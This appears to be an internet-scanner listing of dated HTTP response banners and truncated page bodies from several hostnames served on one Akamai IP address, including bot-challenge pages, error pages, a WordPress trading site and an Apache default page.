Set-Cookie: ak_bmsc=2D21640288C1499F90C1EBE032BF8068~000000000000000000000000000000~YAAQDhczF5jUBXSbAQAA7imIfR7ODR+oy5Qc5mNbA4eTERn1PqWY+Ub8BIlKghnYGL3SQlQAzVYwkkJPrlmJhk/BcBb8+tjRiGEzk0p+Joo9X7pyPPBjl84W8mGDRnNbHu5Z3wC9PKj6QV75PFFBTIwES+ToB3PFXg7ZGvy9d9liwgnbS5vih4f+412c1/QYzG+UPdy/xUsnmRxlqn35tVVAeEpIHmlX8qHsxHK5pwz5cCFQycpnrAZsufXgM2QY4WB2iLTUTAXgLxyJOy6loPZG4UvT8EHqvaic5ELk55P+tf6HofmOAAS2AE/dyqU/PBbjGcE7rBOyf4oV1QTGtC7+45cNBGLVptMX3kMYgzVmU3D/z1AljVp0sN0vWp0ArN52UqgJx/bKMK9hYiZMbQsYYg==; Domain=.www.iso.fr; Path=/; Expires=Fri, 02 Jan 2026 09:07:14 GMT; Max-Age=7200; HttpOnly
Server-Timing: ak_p; desc="1767337634281_389224206_940440628_16_4118_80_0_-";dur=1
Page title:
<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="refresh" content="5; URL='/?bm-verify=AAQAAAAM_____0mZwFrPSovnHBIKRVv7nzPSDad-d0nxlwksX_6fPxs9ugeeTeCgOKHtpurcc1bYt1GIyxP06cr5Rkd5FglCA3RGSpRh52Tlx-W5oXPUr3OM1brPzDArd7kmP9dN3Jos5IVAsadWal7O0zm9ydvxws4FS5b2ZWP64fP_M-o01o8rJdh3liCS2tSh4ZRJmS7tQYbM0F6jbAmLgFixD2s2IqK9kkB7Yb9V3FE'" /><title> </title><script> var i = 1767337634; var j = i + Number("8205" + "9709"); </script> </head> <noscript> <iframe style="border: none; height: 100%; width: 100%;" src=""></iframe></noscript><body style="margin:0; height:100vh; display:flex; justify-content:center; align-items:flex-start;"> <div style="position:relative; top:33vh; text-align:center;"> <div> <p style="font-family:sans-serif; font-size:16px; margin-bottom:12px; color:#333;"> Powered and protected by </p> </div> <div> <img id="akam-logo" src="/_sec/akamai-logo.svg" alt="Powered by Akamai" loading="eager" style="width:200px; height:auto;" /> </div> <div class="akamai-privacy" ><a href="https://www.akamai.com/privacy" target="_blank">Privacy</a> </div> </div> <script> function triggerInterstitialChallenge() {var xhr = new XMLHttpRequest(); xhr.withCredentials = true; xhr.addEventListener("loadend", function() { try { var data = JSON.parse(xhr.responseText); if (data.hasOwnProperty('reload')) { if (data["reload"] == true) { window.location.replace(window.location.href.replace(/[&?]bm-verify=[^#]*/, "")); if(window.location.hash){ window.location.reload(); } } } else if (data.hasOwnProperty('location')) { window.location.replace(data["location"]); } else { window.location.reload(); } } catch (e) { window.location.reload(); }}); xhr.open("POST", "/_sec/verify?provider=interstitial", false); xhr.setRequestHeader("Content-Type", "application/json"); xhr.send(JSON.stringify({"bm-verify": "AAQAAAAM/////3khlqWT0cUusYKc3R+ETmxOAycBD07Mpx48FDsY9k6lWgEhDu62mPwhCe5PGvNtZMProx2h0Q1NP1lhG01DbdPN5T32x12MbnyNegLZV86XHkWWtTY3SvEus7SPYK7oceVa0EyOQuPlxEuNZC1mpD1FWqFogotcNmKAyotyou997lWhfGBQm+Rv2JCl4W77DL52hEQBIyKbzCIPwZjDXfRTRgBQlAU/BroJCTTQuFgpzRi0SnDipgs=", "pow": j}));} try {if (document.getElementById("akam-logo")) {document.getElementById("akam-logo").onload = function () {requestAnimationFrame(triggerInterstitialChallenge);}; document.getElementById("akam-logo").onerror = triggerInterstitialChallenge;} else {triggerInterstitialChallenge()}} catch(e) {triggerInterstitialChallenge();}</script> </body> </html>
Open service 23.50.131.142:443 · uat-backend-app.generalicentrallife.com
2026-01-02 01:05
HTTP/1.1 503 Service Unavailable Mime-Version: 1.0 Content-Type: text/html Content-Length: 278 Expires: Fri, 02 Jan 2026 01:05:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 02 Jan 2026 01:05:51 GMT Connection: close Server-Timing: edge; dur=841 Server-Timing: origin; dur=508 Server-Timing: cdn-cache; desc=MISS Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains Akamai-Cache-Status: NotCacheable from child Akamai-GRN: 0.0e173317.1767315950.377452b0 Server-Timing: ak_p; desc="1767315950406_389224206_930370224_134683_4065_83_183_-";dur=1 Page title: Error <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY> An error occurred while processing your request.<p> Reference #30.e173317.1767315950.377452b0 <P>https://errors.edgesuite.net/30.e173317.1767315950.377452b0</P> </BODY></HTML>
Open service 23.50.131.142:443 · uat-backend-app.generalicentrallife.com
2025-12-30 08:44
HTTP/1.1 503 Service Unavailable Mime-Version: 1.0 Content-Type: text/html Content-Length: 278 Expires: Tue, 30 Dec 2025 08:44:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 30 Dec 2025 08:44:58 GMT Connection: close Server-Timing: edge; dur=416 Server-Timing: origin; dur=195 Server-Timing: cdn-cache; desc=MISS Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains Akamai-Cache-Status: NotCacheable from child Akamai-GRN: 0.0e173317.1767084298.1175b4c5 Server-Timing: ak_p; desc="1767084298024_389224206_292926661_61015_4336_0_3_-";dur=1 Page title: Error <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY> An error occurred while processing your request.<p> Reference #30.e173317.1767084298.1175b4c5 <P>https://errors.edgesuite.net/30.e173317.1767084298.1175b4c5</P> </BODY></HTML>
Open service 23.50.131.142:443 · pages.connectforedge.net
2025-12-25 05:37
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/7.4.8
Link: <https://pages.connectforedge.net/wp-json/>; rel="https://api.w.org/"
Link: <https://pages.connectforedge.net/wp-json/wp/v2/pages/30>; rel="alternate"; type="application/json"
Link: <https://pages.connectforedge.net/>; rel=shortlink
Content-Length: 34069
Date: Thu, 25 Dec 2025 05:37:38 GMT
Connection: close
Set-Cookie: Country=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Page title: Axi – Trade your edge
<!DOCTYPE html>
<html lang="en-AU">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="https://gmpg.org/xfn/11">
<link media="all" href="https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_5d0e66016b28df01d1fa4ab561e7086f.css" rel="stylesheet"><title>Axi – Trade your edge</title>
<meta name='robots' content='noindex, nofollow' />
<script>
dataLayer = [{"title":"Home","author":"admin","wordcount":96,"logged_in":"false","page_id":30,"post_date":"2020-08-06 01:32:28","post_type":"page"}];
</script>
<!-- Anti-flicker snippet (recommended) -->
<script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;
h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;
})(window,document.documentElement,'async-hide','dataLayer',4000,
{'GTM-57CJ7NC':true});</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-57CJ7NC');</script>
<!-- End Google Tag Manager --><link rel="alternate" type="application/rss+xml" title="Axi » Feed" href="https://pages.connectforedge.net/feed/" />
<link rel="alternate" type="application/rss+xml" title="Axi » Comments Feed" href="https://pages.connectforedge.net/comments/feed/" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/pages.connectforedge.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.9"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<link rel='stylesheet' id='elementor-post-95-css' href='https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_single_65d1424c7ef91c723172c1f8a2426213.css?ver=1750226879' media='all' />
<link rel='stylesh
Open service 23.50.131.142:443 · shop-beta-api.gls-italy.com
2025-12-23 08:24
HTTP/1.1 302 Moved Temporarily Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 0 Location: /swagger X-Frame-Options: SAMEORIGIN X-XSS-Protection: 0; mode=block X-Content-Type-Options: nosniff Expires: Tue, 23 Dec 2025 08:24:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 23 Dec 2025 08:24:24 GMT Connection: close Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=83 Server-Timing: origin; dur=5 Server-Timing: ak_p; desc="1766478264306_389224202_2667243808_8831_5240_104_123_-";dur=1
Open service 23.50.131.142:443 · www.diyabet.com
2025-12-23 07:27
HTTP/1.1 200 OK expect-ct: enforce, max-age=21600 referrer-policy: no-referrer-when-downgrade x-original-request-host: www.diyabet.com x-vhost: diyabet.com x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Content-Type: text/html;charset=utf-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31557600 X-Served-By: cache-fra-etou8220181-FRA X-Timer: S1766474821.374612,VS0,VS0,VE19 X-Akamai-Transformed: 9 20932 0 pmb=mRUM,3 Expires: Tue, 23 Dec 2025 07:27:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 23 Dec 2025 07:27:01 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: affinity="80d6879a134b5d15"; Path=/; HttpOnly; secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=6 Server-Timing: origin; dur=20 Akamai-Cache-Status: NotCacheable from child Server-Timing: ak_p; desc="1766474821169_389224196_1356544751_2611_886_99_200_-";dur=1
Open service 23.50.131.142:443 · pages.connectforedge.net
2025-12-23 07:01
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/7.4.8
Link: <https://pages.connectforedge.net/wp-json/>; rel="https://api.w.org/"
Link: <https://pages.connectforedge.net/wp-json/wp/v2/pages/30>; rel="alternate"; type="application/json"
Link: <https://pages.connectforedge.net/>; rel=shortlink
Content-Length: 34069
Date: Tue, 23 Dec 2025 07:01:24 GMT
Connection: close
Set-Cookie: Country=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Page title: Axi – Trade your edge
<!DOCTYPE html>
<html lang="en-AU">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="https://gmpg.org/xfn/11">
<link media="all" href="https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_5d0e66016b28df01d1fa4ab561e7086f.css" rel="stylesheet"><title>Axi – Trade your edge</title>
<meta name='robots' content='noindex, nofollow' />
<script>
dataLayer = [{"title":"Home","author":"admin","wordcount":96,"logged_in":"false","page_id":30,"post_date":"2020-08-06 01:32:28","post_type":"page"}];
</script>
<!-- Anti-flicker snippet (recommended) -->
<script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;
h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;
})(window,document.documentElement,'async-hide','dataLayer',4000,
{'GTM-57CJ7NC':true});</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-57CJ7NC');</script>
<!-- End Google Tag Manager --><link rel="alternate" type="application/rss+xml" title="Axi » Feed" href="https://pages.connectforedge.net/feed/" />
<link rel="alternate" type="application/rss+xml" title="Axi » Comments Feed" href="https://pages.connectforedge.net/comments/feed/" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/pages.connectforedge.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.9"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<link rel='stylesheet' id='elementor-post-95-css' href='https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_single_65d1424c7ef91c723172c1f8a2426213.css?ver=1750226879' media='all' />
<link rel='stylesh
Open service 23.50.131.142:443 · graph-b.test.nu.nl
2025-12-23 02:10
HTTP/1.1 404 Not Found Content-Length: 0 Expires: Tue, 23 Dec 2025 02:10:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 23 Dec 2025 02:10:15 GMT Connection: close
Open service 23.50.131.142:443 · www-nonprod-exo.rubattel-weyermann.ch
2025-12-23 00:16
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 upgrade-insecure-requests: 1 x-xss-protection: 1; mode=block Link: <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/>; rel="https://api.w.org/", <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/wp/v2/pages/8>; rel="alternate"; title="JSON"; type="application/json", <https://www-nonprod-exo.rubattel-weyermann.ch/>; rel=shortlink x-panthera-cache-bypassed: 1 x-frame-options: SAMEORIGIN x-content-type-options: nosniff referrer-policy: same-origin X-Akamai-Transformed: 9 15473 0 pmb=mRUM,2 Expires: Tue, 23 Dec 2025 00:16:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 23 Dec 2025 00:16:22 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: PANTHERASID=9173c689e412d28d; path=/; HttpOnly; Secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=554 Server-Timing: origin; dur=414 Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains ; preload Server-Timing: ak_p; desc="1766448981658_389224208_2120201187_96578_5962_0_2_-";dur=1
Open service 23.50.131.142:443 · graph-b.staging.nu.nl
2025-12-22 19:20
HTTP/1.1 404 Not Found Content-Length: 0 Expires: Mon, 22 Dec 2025 19:20:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Dec 2025 19:20:32 GMT Connection: close
Open service 23.50.131.142:443 · www.iso.fr
2025-12-22 17:23
HTTP/1.1 200 OK
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 2548
Cache-Control: no-cache, no-store, must-revalidate
Expires: 0
Expires: Mon, 22 Dec 2025 17:23:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Dec 2025 17:23:58 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Alt-Svc: h3=":443"; ma=93600
Strict-Transport-Security: max-age=86400 ; includeSubDomains
Set-Cookie: ak_bmsc=B8F034EF78DDD8261B931C16903294C9~000000000000000000000000000000~YAAQDhczFyRa4DubAQAA5NoWRx74OK00zsTkdPdfVOJ/4nhdb4CIUidZh6q5wP/5HiuvMwe+rZTwa3pPy+TAf5Wlf7jnySQII4vxbnrDKzHFhTUqNByIdlaf1WPh8Uzz3Kcd2uTTHS/w+x3EDC3r+nUrO/qqqd/cJxKqSGKqxLkN8IkZhdo6/ZP+iYoy5pptpk1sJqL1WDq0HuH+0cn1S8dKcokTaq3yzpdxUvH4HtbysmXJ14RWZdXo2SuTgHXRse7jcPbvZtmYXaYe6HewF4+U/rh+wVzORw4cyTmdTMYThNAq7q9OBGlrQJBypaxLGn0/tW2i5bV+qpyrnQRMsEzTnTwpsBr8YmAI4XbexGLIr3YaHDUeGn6AfRUXynNANwiE1NqrI+/CAQwIVuKivQIyJljy; Domain=.www.iso.fr; Path=/; Expires=Mon, 22 Dec 2025 19:23:58 GMT; Max-Age=7200; HttpOnly
Server-Timing: ak_p; desc="1766424238801_389224206_785869030_11_19112_256_0_-";dur=1
Page title:
<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="refresh" content="5; URL='/?bm-verify=AAQAAAAM_____5aixCvTaj53oiRSerq6H4xPm-N7HZHCblU7uChswgBmv9hxhIdTyxjHMizD7EpGvEZmtXjKozjFQ00bE5ytFiPXCoGD1Ldm5VztlDax4x8sH8h0-cfuHBwIFtgVFmROFwWDqo0yM5WIPGZmPMpnjqUodxw26q0dLwcFxCWkCzID6yt4tmTk5Xv6lwzqRCpdROESEWRvtMjhWb3zaB3OsmjyLY1qK4VqfOsNDA'" /><title> </title><script> var i = 1766424238; var j = i + Number("2696" + "6849"); </script> </head> <noscript> <iframe style="border: none; height: 100%; width: 100%;" src=""></iframe></noscript><body style="margin:0; height:100vh; display:flex; justify-content:center; align-items:flex-start;"> <div style="position:relative; top:33vh; text-align:center;"> <div> <p style="font-family:sans-serif; font-size:16px; margin-bottom:12px; color:#333;"> Powered and protected by </p> </div> <div> <img id="akam-logo" src="/_sec/akamai-logo.svg" alt="Powered by Akamai" loading="eager" style="width:200px; height:auto;" /> </div> <div class="akamai-privacy" ><a href="https://www.akamai.com/privacy" target="_blank">Privacy</a> </div> </div> <script> function triggerInterstitialChallenge() {var xhr = new XMLHttpRequest(); xhr.withCredentials = true; xhr.addEventListener("loadend", function() { try { var data = JSON.parse(xhr.responseText); if (data.hasOwnProperty('reload')) { if (data["reload"] == true) { window.location.replace(window.location.href.replace(/[&?]bm-verify=[^#]*/, "")); if(window.location.hash){ window.location.reload(); } } } else if (data.hasOwnProperty('location')) { window.location.replace(data["location"]); } else { window.location.reload(); } } catch (e) { window.location.reload(); }}); xhr.open("POST", "/_sec/verify?provider=interstitial", false); xhr.setRequestHeader("Content-Type", "application/json"); xhr.send(JSON.stringify({"bm-verify": "AAQAAAAM/////6/1aRl5A1SXYZ7hglxjBg++TkzV/kj7xn4jj95B65zx9rZt7hXyuWv8lM4qy++NA5fhJfBmBVd/R8r2Dv25QMBzkdrsyDa2aVuPWKqTstiZBM8OWLeIhI+Sbn35hPnt9zC/9u0YFKKIRmOHcGBRmdjaNu19miIvyu9PzLmt28kGkWbySEmZHv5s25izzteApLPrXJmd8TIY/xVSYHATzxCquapzpnsYyDyIQTyl+wRDR3uEWoUsTUlKrg==", "pow": j}));} try {if (document.getElementById("akam-logo")) {document.getElementById("akam-logo").onload = function () {requestAnimationFrame(triggerInterstitialChallenge);}; document.getElementById("akam-logo").onerror = triggerInterstitialChallenge;} else {triggerInterstitialChallenge()}} catch(e) {triggerInterstitialChallenge();}</script> </body> </html>
Open service 23.50.131.142:443 · uat-backend-app.generalicentrallife.com
2025-12-22 10:01
HTTP/1.1 503 Service Unavailable Mime-Version: 1.0 Content-Type: text/html Content-Length: 278 Expires: Mon, 22 Dec 2025 10:01:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Dec 2025 10:01:13 GMT Connection: close Server-Timing: edge; dur=415 Server-Timing: origin; dur=181 Server-Timing: cdn-cache; desc=MISS Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains Akamai-Cache-Status: NotCacheable from child Akamai-GRN: 0.0e173317.1766397673.2b5b8fa1 Server-Timing: ak_p; desc="1766397673051_389224206_727420833_59464_5350_0_2_-";dur=1 Page title: Error <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY> An error occurred while processing your request.<p> Reference #30.e173317.1766397673.2b5b8fa1 <P>https://errors.edgesuite.net/30.e173317.1766397673.2b5b8fa1</P> </BODY></HTML>
Open service 23.50.131.142:443 · www.algerie.stagingirb.bnpparibas
2025-12-22 08:18
HTTP/1.1 200 OK
Last-Modified: Wed, 06 Dec 2023 10:38:27 GMT
Content-Type: text/html
x-varnish-cache: HIT
Date: Mon, 22 Dec 2025 08:18:39 GMT
Content-Length: 10701
Connection: close
Strict-Transport-Security: max-age=15768000
Page title: Apache2 Debian Default Page: It works
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
background-color: #D8DBE2;
font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}
div.main_page {
position: relative;
display: table;
width: 800px;
margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;
border-width: 2px;
border-color: #212738;
border-style: solid;
background-color: #FFFFFF;
text-align: center;
}
div.page_header {
height: 99px;
width: 100%;
background-color: #F5F6F7;
}
div.page_header span {
margin: 15px 0px 0px 50px;
font-size: 180%;
font-weight: bold;
}
div.page_header img {
margin: 3px 0px 0px 40px;
border: 0px 0px 0px;
}
div.table_of_contents {
clear: left;
min-width: 200px;
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.table_of_contents_item {
clear: left;
width: 100%;
margin: 4px 0px 0px 0px;
background-color: #FFFFFF;
color: #000000;
text-align: left;
}
div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}
div.content_section {
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.content_section_text {
padding: 4px 8px 4px 8px;
color: #000000;
font-size: 100%;
}
div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;
border-width: 1px;
border-style: dotted;
border-color: #000000;
background-color: #F5F6F7;
font-style: italic;
}
div.content_section_text p {
margin-bottom: 6px;
}
div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}
div.section_header {
padding: 3px 6px 3px 6px;
background-color: #8E9CB2;
color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}
div.section_header_red {
background-color: #CD214F;
}
div.section_header_grey {
background-color: #9F9386;
}
.floating_element {
position: relative;
float: left;
}
div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}
div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}
div.table_of_contents_item a:hover {
background-color: #000000;
color: #FFFFFF;
}
div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;
color: #000000;
}
div.content_section_text a:hover {
background-color: #000000;
color: #DCDFE6;
}
div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">
<img src="/icons/openlogo-75.png" alt="Debian Logo" class="floating_element"/>
<span class="floating_element">
Apache2 Debian Default Page
</span>
</div>
<!-- <div class="table_of_contents floating_element">
<div class="section_header section_header_grey">
TABLE OF CONTENTS
</div>
<div class="table_of_contents_item floating_element">
<a href="#about">About</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#changes">Changes</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#scope">Scope</a>
</div>
<div class="table_of_contents_item floating_element">
<a hr
Open service 23.50.131.142:443 · pages.connectforedge.net
2025-12-21 06:55
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/7.4.8
Link: <https://pages.connectforedge.net/wp-json/>; rel="https://api.w.org/"
Link: <https://pages.connectforedge.net/wp-json/wp/v2/pages/30>; rel="alternate"; type="application/json"
Link: <https://pages.connectforedge.net/>; rel=shortlink
Content-Length: 34069
Date: Sun, 21 Dec 2025 06:55:17 GMT
Connection: close
Set-Cookie: Country=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Page title: Axi – Trade your edge
<!DOCTYPE html>
<html lang="en-AU">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="https://gmpg.org/xfn/11">
<link media="all" href="https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_5d0e66016b28df01d1fa4ab561e7086f.css" rel="stylesheet"><title>Axi – Trade your edge</title>
<meta name='robots' content='noindex, nofollow' />
<script>
dataLayer = [{"title":"Home","author":"admin","wordcount":96,"logged_in":"false","page_id":30,"post_date":"2020-08-06 01:32:28","post_type":"page"}];
</script>
<!-- Anti-flicker snippet (recommended) -->
<script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;
h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;
})(window,document.documentElement,'async-hide','dataLayer',4000,
{'GTM-57CJ7NC':true});</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-57CJ7NC');</script>
